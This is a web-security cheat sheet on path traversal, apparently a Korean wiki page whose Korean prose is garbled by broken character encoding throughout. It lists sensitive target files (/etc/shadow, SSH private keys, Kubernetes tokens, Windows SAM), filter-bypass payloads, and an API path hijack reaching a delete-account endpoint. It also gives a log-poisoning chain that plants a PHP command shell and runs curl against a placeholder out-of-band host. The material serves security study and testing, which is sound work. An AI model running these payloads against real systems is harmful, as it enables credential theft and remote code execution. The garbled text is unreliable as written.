π Introduction
Path traversal(Directory traversal)μ μλΉμ€μμ μ¬μ©μλ‘λΆν° λ°μ μ λ ₯μ΄ path ννμ λ°±μλμμ μ²λ¦¬ λ‘μ§μ κ°μ§λ κ²½μ°, μ΄λ₯Ό μ‘°μνμ¬ κ³΅κ²©μκ° μνλ κ²½λ‘λ‘ μ κ·Όνμ¬ λμμ μννλ 곡격기λ²μ μλ―Έν©λλ€.
λ³΄ν΅ Fileμ μ²λ¦¬νλ κ³Όμ μμ κ°μ₯ λ§μ΄ λ°μνλ©°, νμΌ μ΄λ¦ λ±μ μ¬μ©μλ‘ λΆν° λ°λ κ²½μ° μ¬μ©μκ° ../ κ°μ ꡬ문μ ν΅ν΄ μμ λλ ν λ¦¬λ‘ μ κ·Όνκ±°λ νμ©λ λλ ν 리μ λ²μλ₯Ό λ²μ΄λ μμ€ν νμΌ λ±μ μ½μ μ μμ΅λλ€.
π‘ Offensive techniques
Detect
μΉ μλΉμ€μμ νλΌλ―Έν°, ν€λ λ±μ μ¬μ©μ μμ²μ΄ μλ²μμ path ννλ‘ μ²λ¦¬νλ λΆλΆμ λͺ¨λ κ°λ₯μ±μ΄ μ‘΄μ¬ν©λλ€. κ°μ₯ μ½κ² μλ³νλ λ°©λ²μ μλμ κ°μ΄ Responseλ‘ μλ³μ΄ κ°λ₯ν νμ΄μ§λ₯Ό μμ²νλ©΄μ ../ λ± νΉμλ¬Έμμ μ²λ¦¬ μνλ₯Ό νμ νλ λ°©λ²μ λλ€.
GET /download?filename=123.txt => (200 OK)
GET /download?filename=444.txt => (404 NotFound)
GET /download?filename=./123.txt => (200 OK)
μμ κ°μ κ²½μ° ./123.txtμ κ°μ΄ path ννλ‘ νΈμΆνμ λ μ μμ μΌλ‘ μ²λ¦¬λ¬κΈ° λλ¬Έμ 2κ°μ§μ κ°λ₯μ±μ κ°μ§λλ€.
- μ€μ pathλ‘ μ²λ¦¬λ κ²½μ°
- λ°±μλμ 보μ λ‘μ§μΌλ‘ ./ κ° blank μ²λ¦¬λ κ²½μ°
μ¬κΈ°μ λλ²μ§Έ μΌμ΄μ€λ₯Ό λ€μ κ±Έλ¬λ΄κΈ° μν΄ μλμ λΉμ·ν ννλ‘ νΈμΆν΄λ΄ λλ€.
GET /download?filename=./123.txt (200 OK)
GET /download?filename=..//123.txt (404 NotFound)
λ§μ½ ./κ° blank μ²λ¦¬λΌλ©΄ ./λ λ μμκ³ , ./123.txtλ‘ λ³νκ±°λ λλ λ°λ³΅μ μΌλ‘ μ²λ¦¬νλλ‘ κ΅¬μ±λ κ²½μ°μλ κ²°κ΅ 123.txtκ° λ¨κΈ° λλ¬Έμ blank μ²λ¦¬ λ‘μ§μ΄λΌλ©΄ 200OKκ° λ°μν΄μΌν©λλ€. λ¨ μ μμμμ 404κ° λ°μνκΈ° λλ¬Έμ path ꡬ문(../)μ μ²λ¦¬ν κ²μΌλ‘ 보μ΄κ³ , μ΄λ μ΄λμ λ μ·¨μ½νλ€κ³ λ³Ό μ μμ΅λλ€.
Exploitation
Get system files
Path traversalμ΄ κ°λ₯νλ€κ³ νλ¨λλ©΄ μ£Όμ μμ€ν νμΌμ μ½μ΄μ€κ±°λ κ²½λ‘λ₯Ό μ‘°μνμ¬ μλΉμ€ μ‘μ μ΄ λ€λ₯Έ ννλ‘ λμνλλ‘ μ λν΄μΌν©λλ€. μΌλ°μ μΌλ‘ μμ€ν νμΌμ μ½λλ° μ¬μ©νλ κ²½λ‘λ μλμ κ°μ΅λλ€.
Linux server
/etc/issue
/etc/passwd
/etc/shadow
/etc/group
/etc/hosts
/etc/motd
/etc/mysql/my.cnf
/proc/[0-9]*/fd/[0-9]* (first number is the PID, second is the filedescriptor)
/proc/self/environ
/proc/version
/proc/cmdline
/proc/sched_debug
/proc/mounts
/proc/net/arp
/proc/net/route
/proc/net/tcp
/proc/net/udp
/proc/self/cwd/index.php
/proc/self/cwd/main.py
/home/$USER/.bash_history
/home/$USER/.ssh/id_rsa
/run/secrets/kubernetes.io/serviceaccount/token
/run/secrets/kubernetes.io/serviceaccount/namespace
/run/secrets/kubernetes.io/serviceaccount/certificate
/var/run/secrets/kubernetes.io/serviceaccount
/var/lib/mlocate/mlocate.db
/var/lib/mlocate.db
Windows server
c:\windows\system32\license.rtf
c:\windows\system32\eula.txt
c:/boot.ini
c:/inetpub/logs/logfiles
c:/inetpub/wwwroot/global.asa
c:/inetpub/wwwroot/index.asp
c:/inetpub/wwwroot/web.config
c:/sysprep.inf
c:/sysprep.xml
c:/sysprep/sysprep.inf
c:/sysprep/sysprep.xml
c:/system32/inetsrv/metabase.xml
c:/sysprep.inf
c:/sysprep.xml
c:/sysprep/sysprep.inf
c:/sysprep/sysprep.xml
c:/system volume information/wpsettings.dat
c:/system32/inetsrv/metabase.xml
c:/unattend.txt
c:/unattend.xml
c:/unattended.txt
c:/unattended.xml
c:/windows/repair/sam
c:/windows/repair/system
RCE with Log poisoning
Path traversalμ΄ κ°λ₯ν μλΉμ€κ° php, asp λ± λ³λμ λΌμ°ν
μμ΄ νμ₯μλ§μΌλ‘ μλ² μ¬μ΄λμ κΈ°λ₯μ μ²λ¦¬ν μ μλ νκ²½μμ include()
ν¨μ λ±μΌλ‘ μ½μ΄μ€λ κ²½μ° Log poisoningκ³Ό μ‘°ν©νμ¬ RCEκΉμ§ μν₯λ ₯μ μ΄λμ΄ λΌ μ μμ΅λλ€. (μΌλ°μ μΌλ‘ μ΄μΌκΈ°νλ LFIμ΄μ£ .)
First request (log poisoning)
GET / HTTP/1.1
User-Agent: aa<?php echo system($_GET['cmd']); ?>bb
Second request (path traversal)
GET /file.php?path=/var/log/apache2/access.log?cmd=curl%20<OAST>/rce HTTP/1.1
API Path Manipulation
Custom Scheme, DeepLink, Reverse Proxy κ΅¬μ± λ± 2 κ΅¬κ° μ΄μμμ API νΈμΆμ μν΄ μ°μμ μΌλ‘ μμ²μ΄ λ°μνλ κ²½μ° Path Traversalμ ν΅ν΄ API μ£Όμλ₯Ό μμ‘°ν μ μμ΅λλ€. λ§μ½ μλμ κ°μ΄ Custom schemeμ νΈμΆνλ κ²½μ° λλ²μ§Έ μ½λ λΈλμ APIκ° λ°μνλ€κ³ κ°μ ν©μλ€.
testapp://profile?id=4541
GET /users/4541/profile HTTP/1.1
μ΄ λ id νλΌλ―Έν°μ Path traversal ꡬ문μ μ΄μ©νμ¬ API Pathλ₯Ό λ³μ‘°νλ©΄ μ¬μ©μμ μΈμ μ μ΄μ©νμ¬ μλνμ§ μμ κΈ°λ₯μ μ€νν μ μκ² λ©λλ€.
testapp://profile?id=../manage/delete-account?
GET /users/../manage/delete-account?/profile HTTP/1.1
Relative Path Overwrite
[ Req ]
GET /page?sink=../../../upload/my_script.js
[ Res ]
...
<script src="asset/js/vendor/../../../upload/my_script.js"></script>
...
RPO(Relative Path Overwrite)μ λν μμΈν λ΄μ©μ Cullinan > Relative Path Overwrite (RPO) λ¬Έμλ₯Ό μ°Έκ³ ν΄μ£ΌμΈμ.
Bypass protection
Basic
../
..\
..\/
%2e%2e%2f
%252e%252e%252f
%c0%ae%c0%ae%c0%af
%uff0e%uff0e%u2215
%uff0e%uff0e%u2216
16 bits Unicode encoding
. = %u002e
/ = %u2215
\ = %u2216
UTF-8 Unicode encoding
. = %c0%2e, %e0%40%ae, %c0ae
/ = %c0%af, %e0%80%af, %c0%2f
\ = %c0%5c, %c0%80%5c
Bypass β../β replaced by ββ
..././
...\.\
Bypass β../β with β;β
..;/
http://domain.tld/page.jsp?include=..;/..;/sensitive.txt
Double URL encoding
. = %252e
/ = %252f
\ = %255c
http://localhost:8080/spring-mvc-showcase/resources/%255c%255c..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/windows/win.ini
UNC Bypass
\\localhost\c$\windows\win.ini
NGINX/ALB Bypass
http://nginx-server/../../ => 400
http://nginx-server////////../../` => 200
Tomcat via reverse proxy mapping
Tomcatμμ κ²½λ‘μ /..;/
μ΄ /../
μ λμΌνκ² λ§€νλ©λλ€. μ΄λ₯Ό μ΄μ©νλ©΄ μ¬λ¬ Hopμ μλΉμ€ ꡬ쑰μμ Path traversalμ΄ κ°λ₯ν©λλ€.
location /api/ {
proxy_pass http://internal_server/testapp/internal/api/
}
http://nginx-server/api/..;/..;/..;/docs/
π‘ Defensive techniques
μ΄λ₯Ό λ°©μ΄νκΈ° μν΄μλ νμΌ λ± Pathλ₯Ό μ²λ¦¬νλ κΈ°λ₯μμ μ¬μ©μ μ λ ₯μ λ°λ κ²½μ° ../ λ± μμ κ²½λ‘λ₯Ό μ§μ νμ§ λͺ»νλλ‘ μ νν΄μΌν©λλ€. 보νΈμ μΌλ‘ 2κ°μ§ μ λμ λμλ°©μμ μ¬μ©ν©λλ€.
Escape
μ¬μ©μ μ λ ₯ ꡬκ°μμ ../ κ³Ό κ°μ΄ Pathλ₯Ό λ°κΏ μ μλ νΉμλ¬Έμ λ±μ λν΄μ μ²λ¦¬νμ§ μλλ‘ κ²μ¦ν΄μΌν©λλ€. κ²μ¦μλ μ¬λ¬κ°μ§ λ°©λ²μ΄ μκ² μ§λ§, 곡ν΅μ μΈ λΆλΆμ . / μ λν μ νκ³Ό μΈμ½λ© λν μ²λ¦¬λ μ μμ΄ λͺ¨λ λμ½λ© ν λ°λ³΅μ μΌλ‘ . / λ₯Ό μ κ±°νλ κ²μ λ§μ΄ μ¬μ©ν©λλ€.
λ¬Όλ‘ μ¬μ©μμ 컨νΈλ‘€μ μ΅μννκΈ° μν΄ μ¬μ©μ μ λ ₯μ΄ pathμ μν₯ μ€ μ μλ λΆλΆμ μ€μ΄λ κ²λ μ’μ΅λλ€.
Permission (Only filesystem)
File λ±μ μ κ·Όμ κ²½μ° ν΄λΉ νλ‘μΈμ€κ° μ΄λν μ μλ μ΅λμ Directoryλ₯Ό μ§μ ν΄μ£Όλ κ²λ μ’μ΅λλ€. μ΄λ μμ€ν νμΌμ μ½μ΄μ€λ €λ μλμ λν΄μ κ°λ ₯νκ² λ§μ μ μμ΅λλ€. λ€λ§ μ΄ λ°©λ²μ κ²½μ° μ°ν κΈ°λ²μ λν΄μλ μμ ν νΈμ΄μ§λ§ νμ©νλ λλ ν 리 λ΄λΆμμλ νμΌμ μ½μ΄μ¬ μ μκ³ , File/Directory κ΄λ ¨ Traversal 곡격μ λν΄μλ§ λμν μ μλ€λ λ¨μ μ΄ μμ΅λλ€.
K/V κΈ°λ°μ νμΌ μμ€ν
AWS S3λ KV(Key/Value) κΈ°λ°μ μ€ν 리μ§μ λλ€. μ΄λ¬ν μ€ν 리μ§λ€μ Kμ λ§€νλ Vλ₯Ό κ°μ Έμ€κΈ° λλ¬Έμ μ¬μ μ νΉμ Kμ μ μμ μΈ Vκ° μΈν λμ§ μλ ν μΌλ°μ μΌλ‘ Path traversal 곡격μ λμν μ μμ΅λλ€.
πΉ Tools
- https://github.com/wireghoul/dotdotpwn
π Articles
- https://www.hahwul.com/2019/09/23/path-traversal-pattern-of-dotdot-slash/
- https://www.hahwul.com/2019/07/02/zap-send-any-tools/#send-to-ddpdotdotpwn
- https://www.hahwul.com/2019/03/17/critical-vulnerability-in-action-view-of-ruby-rails/
- https://www.hahwul.com/2016/05/02/web-hacking-dotdotpwn-path-traversal/
π References
- https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Directory%20Traversal